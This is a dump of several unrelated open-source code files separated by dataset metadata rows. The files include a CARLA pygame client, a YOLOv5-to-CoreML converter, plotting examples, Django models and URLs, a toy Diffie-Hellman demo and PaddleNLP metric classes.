self._notifications.set_text('Error: %s' % text, (255, 0, 0))
def render(self, display):
if self._show_info:
info_surface = pygame.Surface((220, self.dim[1]))
info_surface.set_alpha(100)
display.blit(info_surface, (0, 0))
v_offset = 4
bar_h_offset = 100
bar_width = 106
for item in self._info_text:
text_color = (255, 255, 255)
if v_offset + 18 > self.dim[1]:
break
if isinstance(item, list):
if len(item) > 1:
points = [(x + 8, v_offset + 8 + (1.0 - y) * 30) for x, y in enumerate(item)]
pygame.draw.lines(display, (255, 136, 0), False, points, 2)
item = None
v_offset += 18
elif isinstance(item, tuple):
if isinstance(item[1], bool):
rect = pygame.Rect((bar_h_offset, v_offset + 2), (10, 10))
pygame.draw.rect(display, (255, 255, 255), rect, 0 if item[1] else 1)
else:
# draw allowed steering ranges
if len(item) == 6 and item[2] < 0.0:
for steering_range in item[5]:
starting_value = min(steering_range[0], steering_range[1])
length = (max(steering_range[0], steering_range[1]) -
min(steering_range[0], steering_range[1])) / 2
rect = pygame.Rect(
(bar_h_offset + (starting_value + 1) * (bar_width / 2), v_offset + 2), (length * bar_width, 14))
pygame.draw.rect(display, (0, 255, 0), rect)
# draw border
rect_border = pygame.Rect((bar_h_offset, v_offset + 2), (bar_width, 14))
pygame.draw.rect(display, (255, 255, 255), rect_border, 1)
# draw value / restricted value
input_value_rect_fill = 0
if len(item) >= 5:
if item[1] != item[4]:
input_value_rect_fill = 1
f = (item[4] - item[2]) / (item[3] - item[2])
if item[2] < 0.0:
rect = pygame.Rect(
(bar_h_offset + 1 + f * (bar_width - 6), v_offset + 3), (12, 12))
else:
rect = pygame.Rect((bar_h_offset + 1, v_offset + 3), (f * bar_width, 12))
pygame.draw.rect(display, (255, 0, 0), rect)
f = (item[1] - item[2]) / (item[3] - item[2])
rect = None
if item[2] < 0.0:
rect = pygame.Rect((bar_h_offset + 2 + f * (bar_width - 14), v_offset + 4), (10, 10))
else:
if item[1] != 0:
rect = pygame.Rect((bar_h_offset + 2, v_offset + 4), (f * (bar_width - 4), 10))
if rect:
pygame.draw.rect(display, (255, 255, 255), rect, input_value_rect_fill)
item = item[0]
if item: # At this point has to be a str.
surface = self._font_mono.render(item, True, text_color)
display.blit(surface, (8, v_offset))
v_offset += 18
self.rss_state_visualizer.render(display, v_offset)
self._notifications.render(display)
self.help.render(display)
# ==============================================================================
# -- FadingText ----------------------------------------------------------------
# ==============================================================================
class FadingText(object):
def __init__(self, font, dim, pos):
self.font = font
self.dim = dim
self.pos = pos
self.seconds_left = 0
self.surface = pygame.Surface(self.dim)
def set_text(self, text, color=(255, 255, 255), seconds=2.0):
text_texture = self.font.render(text, True, color)
self.surface = pygame.Surface(self.dim)
self.seconds_left = seconds
self.surface.fill((0, 0, 0, 0))
self.surface.blit(text_texture, (10, 11))
def tick(self, clock):
delta_seconds = 1e-3 * clock.get_time()
self.seconds_left = max(0.0, self.seconds_left - delta_seconds)
self.surface.set_alpha(500.0 * self.seconds_left)
def render(self, display):
display.blit(self.surface, self.pos)
# ==============================================================================
# -- HelpText ------------------------------------------------------------------
# ==============================================================================
class HelpText(object):
"""Helper class to handle text output using pygame"""
def __init__(self, font, width, height):
lines = __doc__.split('\n')
self.font = font
self.line_space = 18
self.dim = (780, len(lines) * self.line_space + 12)
self.pos = (0.5 * width - 0.5 * self.dim[0], 0.5 * height - 0.5 * self.dim[1])
self.seconds_left = 0
self.surface = pygame.Surface(self.dim)
self.surface.fill((0, 0, 0, 0))
for n, line in enumerate(lines):
text_texture = self.font.render(line, True, (255, 255, 255))
self.surface.blit(text_texture, (22, n * self.line_space))
self._render = False
self.surface.set_alpha(220)
def toggle(self):
self._render = not self._render
def render(self, display):
if self._render:
display.blit(self.surface, self.pos)
# ==============================================================================
# -- game_loop() ---------------------------------------------------------------
# ==============================================================================
def game_loop(args):
pygame.init()
pygame.font.init()
world = None
try:
client = carla.Client(args.host, args.port)
client.set_timeout(2.0)
display = pygame.display.set_mode(
(args.width, args.height),
pygame.HWSURFACE | pygame.DOUBLEBUF)
world = World(client.get_world(), args)
controller = VehicleControl(world, args.autopilot)
clock = pygame.time.Clock()
while True:
clock.tick_busy_loop(60)
if controller.parse_events(world, clock):
return
world.tick(clock)
world.render(display)
controller.render(display)
pygame.display.flip()
finally:
if world is not None:
print('Destroying the world...')
world.destroy()
print('Destroyed!')
pygame.quit()
# ==============================================================================
# -- main() --------------------------------------------------------------------
# ==============================================================================
def main():
argparser = argparse.ArgumentParser(
description='CARLA Manual Control Client RSS')
argparser.add_argument(
'-v', '--verbose',
action='store_true',
dest='debug',
help='print debug information')
argparser.add_argument(
'--host',
metavar='H',
default='127.0.0.1',
help='IP of the host server (default: 127.0.0.1)')
argparser.add_argument(
'-p', '--port',
metavar='P',
default=2000,
type=int,
help='TCP port to listen to (default: 2000)')
argparser.add_argument(
'-a', '--autopilot',
action='store_true',
help='enable autopilot')
argparser.add_argument(
'--res',
metavar='WIDTHxHEIGHT',
default='1280x720',
help='window resolution (default: 1280x720)')
argparser.add_argument(
'--filter',
metavar='PATTERN',
default='vehicle.*',
help='actor filter (default: "vehicle.*")')
argparser.add_argument(
'--rolename',
metavar='NAME',
default='hero',
help='actor role name (default: "hero")')
argparser.add_argument(
'--externalActor',
action='store_true',
help='attaches to externally created actor by role name')
args = argparser.parse_args()
args.width, args.height = [int(x) for x in args.res.split('x')]
log_level = logging.DEBUG if args.debug else logging.INFO
logging.basicConfig(format='%(levelname)s: %(message)s', level=log_level)
logging.info('listening to server %s:%s', args.host, args.port)
print(__doc__)
signal.signal(signal.SIGINT, VehicleControl.signal_handler)
try:
game_loop(args)
except KeyboardInterrupt:
print('\nCancelled by user. Bye!')
if __name__ == '__main__':
main()
| 42.245734 | 166 | 0.544595 |
6b5102122690693b3c654ceed20af7dcc21c36eb
| 2,603 |
py
|
Python
|
yolov5-coreml-tflite-converter/coreml/convert.py
|
SchweizerischeBundesbahnen/sbb-ml-models
|
485356aeb0a277907c160d435f7f654154046a70
|
[
"MIT"
] | null | null | null |
yolov5-coreml-tflite-converter/coreml/convert.py
|
SchweizerischeBundesbahnen/sbb-ml-models
|
485356aeb0a277907c160d435f7f654154046a70
|
[
"MIT"
] | null | null | null |
yolov5-coreml-tflite-converter/coreml/convert.py
|
SchweizerischeBundesbahnen/sbb-ml-models
|
485356aeb0a277907c160d435f7f654154046a70
|
[
"MIT"
] | null | null | null |
# Copyright (C) 2021 DB Systel GmbH.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
########
# Copyright (C) 2021 SBB
#
# Modification statement in accordance with the Apache 2.0 license:
# This code was modified by Ferdinand Niedermann for SBB in 2021.
# The modifications are NOT published under the Apache 2.0 license.
########
from argparse import ArgumentParser
from constants import DEFAULT_MODEL_OUTPUT_DIR, DEFAULT_COREML_NAME, DEFAULT_INPUT_RESOLUTION, \
DEFAULT_QUANTIZATION_TYPE
from coreml_converter.pytorch_to_coreml_converter import PytorchToCoreMLConverter
def main():
parser = ArgumentParser()
parser.add_argument('--model', type=str, dest="model_input_path", required=True,
help=f"The path to yolov5 model.")
parser.add_argument('--out', type=str, dest="model_output_directory", default=DEFAULT_MODEL_OUTPUT_DIR,
help=f"The path to the directory in which to save the converted model. Default: {DEFAULT_MODEL_OUTPUT_DIR}")
parser.add_argument('--output-name', type=str, dest="model_output_name",
default=DEFAULT_COREML_NAME, help=f'The model output name. Default: {DEFAULT_COREML_NAME}')
parser.add_argument('--input-resolution', type=int, dest="input_resolution", default=DEFAULT_INPUT_RESOLUTION,
help=f'The resolution of the input images, e.g. {DEFAULT_INPUT_RESOLUTION} means input resolution is {DEFAULT_INPUT_RESOLUTION}x{DEFAULT_INPUT_RESOLUTION}. Default: {DEFAULT_INPUT_RESOLUTION}') # height, width
parser.add_argument('--quantize-model', nargs='+', dest="quantization_types", default=[DEFAULT_QUANTIZATION_TYPE],
help=f"Quantization: 'int8', 'float16' or 'float32' for no quantization. Default: [{DEFAULT_QUANTIZATION_TYPE}]")
opt = parser.parse_args()
converter = PytorchToCoreMLConverter(opt.model_input_path, opt.model_output_directory, opt.model_output_name,
opt.quantization_types, opt.input_resolution)
converter.convert()
if __name__ == '__main__':
main()
| 51.039216 | 234 | 0.726469 |
6b56dbb74b79b7a2d6738dd0d5829d84d280de45
| 3,099 |
py
|
Python
|
src/bar-charts/bars.py
|
Ellon-M/visualizations
|
5a42c213ea8fd0597e2035778d9ae6460eb9e821
|
[
"MIT"
] | null | null | null |
src/bar-charts/bars.py
|
Ellon-M/visualizations
|
5a42c213ea8fd0597e2035778d9ae6460eb9e821
|
[
"MIT"
] | null | null | null |
src/bar-charts/bars.py
|
Ellon-M/visualizations
|
5a42c213ea8fd0597e2035778d9ae6460eb9e821
|
[
"MIT"
] | null | null | null |
# Bar chart
# a graph that represents the category of data with rectangular bars with lengths and heights that are proportional
# to the values which they represent.
# Can be vertical or horizontal. Can also be grouped.
# matplotlib
fig, ax = plt.subplots(1, figsize=(24,14))
plt.bar(wrestling_count.index, wrestling_count.ID, width=0.9, color='xkcd:plum', edgecolor='ivory', linewidth=0, hatch='-')
plt.setp(ax.get_xticklabels(), rotation=45, ha='right', rotation_mode='anchor')
plt.title('\nHUNGARIAN WRESTLERS\n', fontsize=55, loc='left')
ax.tick_params(axis='x', size=8, labelsize=26)
ax.tick_params(axis='y', size=8, labelsize=26)
fig.show()
# plotly of the above
fig = px.bar(
wrestling_count,
x='Games',
y='ID',
labels={'index':'Games'},
title='HUNGARIAN WRESTLERS',
text="ID",
color="ID",
template = "plotly_dark",
)
fig.update_traces(textfont_size=12, textangle=0, textposition="outside", cliponaxis=False)
fig.show()
# horizontal bars
y = np.array(winter_games_gold_fs['Games'])
x = np.array(winter_games_gold_fs['Age'])
fig, ax = plt.subplots(1, figsize=(24,15))
ax.barh(y, x, color='xkcd:darkblue', edgecolor='ivory', linewidth=0, hatch='-')
ax.set_yticks(y, labels=winter_games_gold_fs['Games'], fontsize=20)
ax.invert_yaxis()
ax.set_xlabel('Age', fontsize=35)
ax.set_title("\nFREESTYLE SKIER'S AGES -\nGOLD MEDALISTS\n", fontsize=44, loc='left')
ax.tick_params(axis='x', labelsize=30)
ax.tick_params(axis='y', labelsize=30)
plt.show()
# plotly of the above
fig = px.bar(
winter_games_gold_fs,
x='Age',
y='Games',
title="FREESTYLE SKIER'S AGES - GOLD MEDALISTS",
text="Age",
color="Age",
color_continuous_scale='Bluered_r',
template = "plotly_dark",
orientation="h"
)
fig.update_traces(textfont_size=12, textangle=0, textposition="inside", cliponaxis=False)
fig.show()
# grouped bars
fig, ax = plt.subplots(figsize = (30,20))
width = 0.4
labels = gymnists_fn.Year.unique()
label_locations = np.arange(len(gymnists_fn.Games.unique()))
y_m = np.array(gymnists_fn_m.ID)
y_w = np.array(gymnists_fn_w.ID)
semi_bar_m = ax.bar(label_locations-width/2, y_m, width, label="M", color='xkcd:brown')
semi_bar_w = ax.bar(label_locations+width/2, y_w, width, label="F", color='purple')
ax.set_ylabel('Athlete Count', fontsize=30)
ax.set_title('\nFRENCH GYMNISTS FROM 1952 \n', fontsize=46, loc='left')
ax.set_xticks(label_locations, labels, fontsize=30)
ax.tick_params(axis='y', labelsize=26)
ax.legend(prop={'size': 36}, shadow=True)
ax.bar_label(semi_bar_m, padding=3, fontsize=24)
ax.bar_label(semi_bar_w, padding=3, fontsize=24)
plt.show()
# plotly of the above
# done with graph objects
fig = go.Figure()
fig.add_trace(go.Bar(
x=labels,
y= y_m,
name='Male',
marker_color='saddlebrown'
))
fig.add_trace(go.Bar(
x=labels,
y=y_w,
name='Female',
marker_color='lightsalmon'
))
# Here we modify the tickangle of the xaxis, resulting in rotated labels.
fig.update_layout(barmode='group', xaxis_tickangle=-45, font=dict(size=18), title="FRENCH GYMNISTS FROM 1952")
fig.show()
| 27.918919 | 123 | 0.709584 |
6b85f4abd3aced7b088690f1385a31fbba845a96
| 811 |
py
|
Python
|
crypto/diffie_hellman/example.py
|
yujungcheng/algorithm_and_data_structure
|
3742238227067217b82bf35ca3a968db4375f3c9
|
[
"Apache-2.0"
] | null | null | null |
crypto/diffie_hellman/example.py
|
yujungcheng/algorithm_and_data_structure
|
3742238227067217b82bf35ca3a968db4375f3c9
|
[
"Apache-2.0"
] | null | null | null |
crypto/diffie_hellman/example.py
|
yujungcheng/algorithm_and_data_structure
|
3742238227067217b82bf35ca3a968db4375f3c9
|
[
"Apache-2.0"
] | 1 |
2020-04-16T01:17:04.000Z
|
2020-04-16T01:17:04.000Z
|
#!/usr/bin/python3
# ref: https://en.wikipedia.org/wiki/Diffie%E2%80%93Hellman_key_exchange#Cryptographic_explanation
# ref: https://en.wikipedia.org/wiki/RSA_(cryptosystem)
shared_modulus = 23
shared_base = 5
print("shared modulus: %s" % shared_modulus)
print("shared base: %s" % shared_base)
print("-"*40)
alice_secret = 4
bob_secret = 3
print("alice's secret key: %s" % alice_secret)
print("bob's secret key: %s" % bob_secret)
print("-"*40)
A = (shared_base**alice_secret) % shared_modulus
B = (shared_base**bob_secret) % shared_modulus
print("alice's public key: %s" % A)
print("bob's public key: %s" % B)
print("-"*40)
alice_s = (B**alice_secret) % shared_modulus
bob_s = (A**bob_secret) % shared_modulus
print("alice's shared secret key: %s" % alice_s)
print("bob's shared secret key: %s" % bob_s)
| 27.033333 | 98 | 0.711467 |
d4538d814fee30600bb7a5ca2ff2e9bd855cf0fc
| 2,361 |
py
|
Python
|
apps/profile/models.py
|
IT-PM-OpenAdaptronik/Webapp
|
c3bdde0ca56b6d77f49bc830fa2b8bb41a26bae4
|
[
"MIT"
] | 2 |
2017-12-17T21:28:22.000Z
|
2018-02-02T14:44:58.000Z
|
apps/profile/models.py
|
IT-PM-OpenAdaptronik/Webapp
|
c3bdde0ca56b6d77f49bc830fa2b8bb41a26bae4
|
[
"MIT"
] | 118 |
2017-10-31T13:45:09.000Z
|
2018-02-24T20:51:42.000Z
|
apps/profile/models.py
|
OpenAdaptronik/Rattler
|
c3bdde0ca56b6d77f49bc830fa2b8bb41a26bae4
|
[
"MIT"
] | null | null | null |
import os
from django.db import models
from django.conf import settings
from django.utils.translation import gettext_lazy as _
from django.db.models.signals import post_save
from django.dispatch import receiver
from django.contrib.auth import get_user_model
# Create your models here.
class Profile(models.Model):
user = models.OneToOneField(settings.AUTH_USER_MODEL, on_delete=models.CASCADE, verbose_name=_('user') )
company = models.CharField(_('company'),max_length=255, null=True, blank=True)
info = models.CharField(_('info'),max_length=255, null=True, blank=True)
expert = models.BooleanField(_('expert'),default=False)
visibility_mail = models.BooleanField(_('visibility of mail adress'),default=False)
visibility_company = models.BooleanField(_('visibility of company'),default=False)
visibility_info = models.BooleanField(_('visibility of information'),default=False)
visibility_first_name = models.BooleanField(_('visibility of first name'),default=False)
visibility_last_name = models.BooleanField(_('visibility of last name'), default=False)
max_projects = models.IntegerField(_('maximum number of projects'),default=5)
max_datarows = models.IntegerField(_('maximum number of datarows'), default=100000)
created = models.DateTimeField(_('created'),auto_now_add=True)
updated = models.DateTimeField(_('updated'),auto_now=True)
def __str__(self):
return _('%(username)s profile') % {'username': self.user.username}
def profile_image_path(instance, filename):
return 'profile/%s%s' % (instance.profile.id, os.path.splitext(filename)[1])
class ProfileImage(models.Model):
profile = models.OneToOneField(Profile, on_delete=models.CASCADE, verbose_name=_('profile'))
path = models.ImageField(_('path'),upload_to=profile_image_path)
created = models.DateTimeField(_('created'),auto_now_add=True)
updated = models.DateTimeField(_('updated'),auto_now=True)
class Meta:
verbose_name = _('profile image')
verbose_name_plural = _('profile images')
@receiver(post_save, sender=get_user_model())
def create_user_profile(sender, instance, created, **kwargs):
if created:
Profile.objects.create(user=instance)
@receiver(post_save, sender=get_user_model())
def save_user_profile(sender, instance, **kwargs):
instance.profile.save()
| 42.927273 | 108 | 0.750953 |
d47bd2d6d94f921e95f859f1b197ebbf9fa00b80
| 744 |
py
|
Python
|
my-cs/intern/java_details/java_sort_selection_details/partioners/__init__.py
|
zaqwes8811/cs-courses
|
aa9cf5ad109c9cfcacaadc11bf2defb2188ddce2
|
[
"Apache-2.0"
] | null | null | null |
my-cs/intern/java_details/java_sort_selection_details/partioners/__init__.py
|
zaqwes8811/cs-courses
|
aa9cf5ad109c9cfcacaadc11bf2defb2188ddce2
|
[
"Apache-2.0"
] | null | null | null |
my-cs/intern/java_details/java_sort_selection_details/partioners/__init__.py
|
zaqwes8811/cs-courses
|
aa9cf5ad109c9cfcacaadc11bf2defb2188ddce2
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
class Partitioner(object):
@staticmethod
def partition(array):
"""
Берем певый в качастве Pivot
"""
IDX_PIVOT = 0 # Возможно лучше выбрать последний
# тогда будет проще работать с индексами
pivot_value = array[IDX_PIVOT]
i = 1
for j, value in enumerate(array):
# j сканирет весь, но первый элемент пропускаем
if j == 0:
continue
if pivot_value > array[j]:
swap(array, j, i)
i += 1
# Last swap
swap(array, IDX_PIVOT, i-1)
return i # Текущий номер pivot
def swap(array, i, j):
a, b = i, j
array[b], array[a] = array[a], array[b]
| 24 | 59 | 0.517473 |
d85b7bdeee038a84450fe5c219c6e1818e24d8af
| 1,444 |
py
|
Python
|
rating/responsive_layout.py
|
thegreenwebfoundation/green-spider
|
68f22886178bbe5b476a4591a6812ee25cb5651b
|
[
"Apache-2.0"
] | 19 |
2018-04-20T11:03:41.000Z
|
2022-01-12T20:58:56.000Z
|
rating/responsive_layout.py
|
thegreenwebfoundation/green-spider
|
68f22886178bbe5b476a4591a6812ee25cb5651b
|
[
"Apache-2.0"
] | 160 |
2018-04-05T16:12:59.000Z
|
2022-03-01T13:01:27.000Z
|
rating/responsive_layout.py
|
thegreenwebfoundation/green-spider
|
68f22886178bbe5b476a4591a6812ee25cb5651b
|
[
"Apache-2.0"
] | 8 |
2018-11-05T13:07:57.000Z
|
2021-06-11T11:46:43.000Z
|
"""
This gives a score if the site's minimal document width during checks
was smaller than or equal to the minimal viewport size tested.
"""
from rating.abstract_rater import AbstractRater
class Rater(AbstractRater):
rating_type = 'boolean'
default_value = False
depends_on_checks = ['load_in_browser']
max_score = 1
def __init__(self, check_results):
super().__init__(check_results)
def rate(self):
value = self.default_value
score = 0
for url in self.check_results['load_in_browser']:
if 'min_document_width' not in self.check_results['load_in_browser'][url]:
continue
if 'sizes' not in self.check_results['load_in_browser'][url]:
continue
if self.check_results['load_in_browser'][url]['sizes'] == []:
continue
if self.check_results['load_in_browser'][url]['sizes'] is None:
continue
if (self.check_results['load_in_browser'][url]['min_document_width'] <=
self.check_results['load_in_browser'][url]['sizes'][0]['viewport_width']):
value = True
score = self.max_score
# we use the first URL found here
break
return {
'type': self.rating_type,
'value': value,
'score': score,
'max_score': self.max_score,
}
| 31.391304 | 90 | 0.587258 |
5ad862a436266f8215754ad931c6e1e64b1aef34
| 865 |
py
|
Python
|
frappe-bench/apps/erpnext/erpnext/patches/v8_0/rename_items_in_status_field_of_material_request.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | 1 |
2021-04-29T14:55:29.000Z
|
2021-04-29T14:55:29.000Z
|
frappe-bench/apps/erpnext/erpnext/patches/v8_0/rename_items_in_status_field_of_material_request.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
frappe-bench/apps/erpnext/erpnext/patches/v8_0/rename_items_in_status_field_of_material_request.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | 1 |
2021-04-29T14:39:01.000Z
|
2021-04-29T14:39:01.000Z
|
from __future__ import unicode_literals
import frappe
def execute():
frappe.db.sql(
"""
UPDATE `tabMaterial Request`
SET status = CASE
WHEN docstatus = 2 THEN 'Cancelled'
WHEN docstatus = 0 THEN 'Draft'
ELSE CASE
WHEN status = 'Stopped' THEN 'Stopped'
WHEN status != 'Stopped' AND per_ordered = 0 THEN 'Pending'
WHEN per_ordered < 100 AND per_ordered > 0 AND status != 'Stopped'
THEN 'Partially Ordered'
WHEN per_ordered = 100 AND material_request_type = 'Purchase'
AND status != 'Stopped' THEN 'Ordered'
WHEN per_ordered = 100 AND material_request_type = 'Material Transfer'
AND status != 'Stopped' THEN 'Transferred'
WHEN per_ordered = 100 AND material_request_type = 'Material Issue'
AND status != 'Stopped' THEN 'Issued'
END
END
"""
)
| 34.6 | 78 | 0.643931 |
8505fd6ee76213eef44b6d8bb755c33c9a3f134e
| 2,750 |
py
|
Python
|
Implementierung/ResearchEnvironment/AuthorizationManagement/urls.py
|
Sashks/PSE
|
ae2d8133a85563c33583f15b9ba76a3a2bf0c762
|
[
"MIT"
] | null | null | null |
Implementierung/ResearchEnvironment/AuthorizationManagement/urls.py
|
Sashks/PSE
|
ae2d8133a85563c33583f15b9ba76a3a2bf0c762
|
[
"MIT"
] | null | null | null |
Implementierung/ResearchEnvironment/AuthorizationManagement/urls.py
|
Sashks/PSE
|
ae2d8133a85563c33583f15b9ba76a3a2bf0c762
|
[
"MIT"
] | null | null | null |
from django.urls import path
from AuthorizationManagement import views
from django.urls.conf import re_path
from .admin import resource_manager
from .admin import user_manager
from .views import *
urlpatterns = [
path('', views.homeView, name='home'),
re_path(r'^resource-manager/', resource_manager.urls),
re_path(r'^user-manager/', user_manager.urls),
#this section should be commented for now, so that we can work with the /admin interface from django;
#that means views.foo should not be used for now
re_path(r'^profile/', views.ProfileView.as_view(), name = 'profile'),
re_path(r'^my-resources/$', views.MyResourcesView.as_view(), name = 'my resources' ),
# re_path(r'^profile/handle/$', views.ChosenRequestView.as_view(), name = 'handle request'),
re_path(r'^handle/(?P<pk>\d+)$', views.ChosenRequestsView.as_view(), name='handle request'),
re_path(r'^my-resources/(?P<resourceid>\d+)-edit-users-permissions/$', views.PermissionEditingView.as_view(), name='edit permissions'),
# re_path(r'^profile/resources/add_new_resource/$', views.index),
# re_path(r'^profile/resources/(?P<resourceID>\w+)_send_deletion_request/$', views.foo),
# re_path(r'^profile/resources/(?P<resourceID>\w+)_edit_users_permissions/reason_for_change/$', views.foo),
#
# re_path(r'^login/$', views.index),
#
# re_path(r'^manage_users/$', views.index),
# re_path(r'^manage_users/block_user/$', views.index),
# re_path(r'^manage_users/delete_user/$', views.index),
# re_path(r'^manage_users/(?P<userID>\w+)_permissions_for_resources/$', views.foo),
# re_path(r'^manage_users/(?P<userID>\w+)_permissions_for_resources/reason_for_change/$', views.foo),
#
# re_path(r'^manage_resources/$', views.index),
# re_path(r'^manage_resources/delete_resource/$', views.index),
# re_path(r'^manage_resources/(?P<resourceID>\w+)_permissions_for_users/$', views.foo),
# re_path(r'^manage_resources/(?P<resourceID>\w+)_permissions_for_users/reason_for_change/$', views.foo),
#
re_path(r'^resources-overview/$', views.ResourcesOverview.as_view(), name='resource-overview'),
re_path(r'^resources-overview/search$', views.ResourcesOverviewSearch.as_view(), name='search-resources'),
re_path(r'^resources/\w+\d*\.txt$', views.download, name='download resources'),
re_path(r'^send-access-request/\d*$', views.send_access_request, name='send-access-request'),
re_path(r'^cancel-access-request/\d*$', views.cancel_access_request, name='cancel-access-request')
# re_path(r'^resources_overview/(?P<resourceID>\w+)_send_request/$', views.foo),
#
# re_path(r'^(?P<resourceID>\w+)/$', views.foo),
]
| 48.245614 | 139 | 0.690909 |
850cc4679d74c30a88ccf7b06dc3bb692a8ec0f0
| 24,334 |
py
|
Python
|
paddlenlp/metrics/glue.py
|
mukaiu/PaddleNLP
|
0315365dbafa6e3b1c7147121ba85e05884125a5
|
[
"Apache-2.0"
] | null | null | null |
paddlenlp/metrics/glue.py
|
mukaiu/PaddleNLP
|
0315365dbafa6e3b1c7147121ba85e05884125a5
|
[
"Apache-2.0"
] | null | null | null |
paddlenlp/metrics/glue.py
|
mukaiu/PaddleNLP
|
0315365dbafa6e3b1c7147121ba85e05884125a5
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import math
import warnings
from functools import partial
import numpy as np
import paddle
from paddle.metric import Metric, Accuracy, Precision, Recall
__all__ = ['AccuracyAndF1', 'Mcc', 'PearsonAndSpearman', 'MultiLabelsMetric']
class AccuracyAndF1(Metric):
"""
This class encapsulates Accuracy, Precision, Recall and F1 metric logic,
and `accumulate` function returns accuracy, precision, recall and f1.
The overview of all metrics could be seen at the document of `paddle.metric
<https://www.paddlepaddle.org.cn/documentation/docs/zh/develop/api/paddle/metric/Overview_cn.html>`_
for details.
Args:
topk (int or tuple(int), optional):
Number of top elements to look at for computing accuracy.
Defaults to (1,).
pos_label (int, optional): The positive label for calculating precision
and recall.
Defaults to 1.
name (str, optional):
String name of the metric instance. Defaults to 'acc_and_f1'.
Example:
.. code-block::
import paddle
from paddlenlp.metrics import AccuracyAndF1
x = paddle.to_tensor([[0.1, 0.9], [0.5, 0.5], [0.6, 0.4], [0.7, 0.3]])
y = paddle.to_tensor([[1], [0], [1], [1]])
m = AccuracyAndF1()
correct = m.compute(x, y)
m.update(correct)
res = m.accumulate()
print(res) # (0.5, 0.5, 0.3333333333333333, 0.4, 0.45)
"""
def __init__(self,
topk=(1, ),
pos_label=1,
name='acc_and_f1',
*args,
**kwargs):
super(AccuracyAndF1, self).__init__(*args, **kwargs)
self.topk = topk
self.pos_label = pos_label
self._name = name
self.acc = Accuracy(self.topk, *args, **kwargs)
self.precision = Precision(*args, **kwargs)
self.recall = Recall(*args, **kwargs)
self.reset()
def compute(self, pred, label, *args):
"""
Accepts network's output and the labels, and calculates the top-k
(maximum value in topk) indices for accuracy.
Args:
pred (Tensor):
Predicted tensor, and its dtype is float32 or float64, and
has a shape of [batch_size, num_classes].
label (Tensor):
The ground truth tensor, and its dtype is is int64, and has a
shape of [batch_size, 1] or [batch_size, num_classes] in one
hot representation.
Returns:
Tensor: Correct mask, each element indicates whether the prediction
equals to the label. Its' a tensor with a data type of float32 and
has a shape of [batch_size, topk].
"""
self.label = label
self.preds_pos = paddle.nn.functional.softmax(pred)[:, self.pos_label]
return self.acc.compute(pred, label)
def update(self, correct, *args):
"""
Updates the metrics states (accuracy, precision and recall), in order to
calculate accumulated accuracy, precision and recall of all instances.
Args:
correct (Tensor):
Correct mask for calculating accuracy, and it's a tensor with
shape [batch_size, topk] and has a dtype of
float32.
"""
self.acc.update(correct)
self.precision.update(self.preds_pos, self.label)
self.recall.update(self.preds_pos, self.label)
def accumulate(self):
"""
Calculates and returns the accumulated metric.
Returns:
tuple: The accumulated metric. A tuple of shape (acc, precision,
recall, f1, average_of_acc_and_f1)
With the fields:
- `acc` (numpy.float64):
The accumulated accuracy.
- `precision` (numpy.float64):
The accumulated precision.
- `recall` (numpy.float64):
The accumulated recall.
- `f1` (numpy.float64):
The accumulated f1.
- `average_of_acc_and_f1` (numpy.float64):
The average of accumulated accuracy and f1.
"""
acc = self.acc.accumulate()
precision = self.precision.accumulate()
recall = self.recall.accumulate()
if precision == 0.0 or recall == 0.0:
f1 = 0.0
else:
# 1/f1 = 1/2 * (1/precision + 1/recall)
f1 = (2 * precision * recall) / (precision + recall)
return (
acc,
precision,
recall,
f1,
(acc + f1) / 2,
)
def reset(self):
"""
Resets all metric states.
"""
self.acc.reset()
self.precision.reset()
self.recall.reset()
self.label = None
self.preds_pos = None
def name(self):
"""
Returns name of the metric instance.
Returns:
str: The name of the metric instance.
"""
return self._name
class Mcc(Metric):
"""
This class calculates `Matthews correlation coefficient <https://en.wikipedia.org/wiki/Matthews_correlation_coefficient>`_ .
Args:
name (str, optional):
String name of the metric instance. Defaults to 'mcc'.
Example:
.. code-block::
import paddle
from paddlenlp.metrics import Mcc
x = paddle.to_tensor([[-0.1, 0.12], [-0.23, 0.23], [-0.32, 0.21], [-0.13, 0.23]])
y = paddle.to_tensor([[1], [0], [1], [1]])
m = Mcc()
(preds, label) = m.compute(x, y)
m.update((preds, label))
res = m.accumulate()
print(res) # (0.0,)
"""
def __init__(self, name='mcc', *args, **kwargs):
super(Mcc, self).__init__(*args, **kwargs)
self._name = name
self.tp = 0 # true positive
self.fp = 0 # false positive
self.tn = 0 # true negative
self.fn = 0 # false negative
def compute(self, pred, label, *args):
"""
Processes the pred tensor, and returns the indices of the maximum of each
sample.
Args:
pred (Tensor):
The predicted value is a Tensor with dtype float32 or float64.
Shape is [batch_size, 1].
label (Tensor):
The ground truth value is Tensor with dtype int64, and its
shape is [batch_size, 1].
Returns:
tuple: A tuple of preds and label. Each shape is
[batch_size, 1], with dtype float32 or float64.
"""
preds = paddle.argsort(pred, descending=True)[:, :1]
return (preds, label)
def update(self, preds_and_labels):
"""
Calculates states, i.e. the number of true positive, false positive,
true negative and false negative samples.
Args:
preds_and_labels (tuple[Tensor]):
Tuple of predicted value and the ground truth label, with dtype
float32 or float64. Each shape is [batch_size, 1].
"""
preds = preds_and_labels[0]
labels = preds_and_labels[1]
if isinstance(preds, paddle.Tensor):
preds = preds.numpy()
if isinstance(labels, paddle.Tensor):
labels = labels.numpy().reshape(-1, 1)
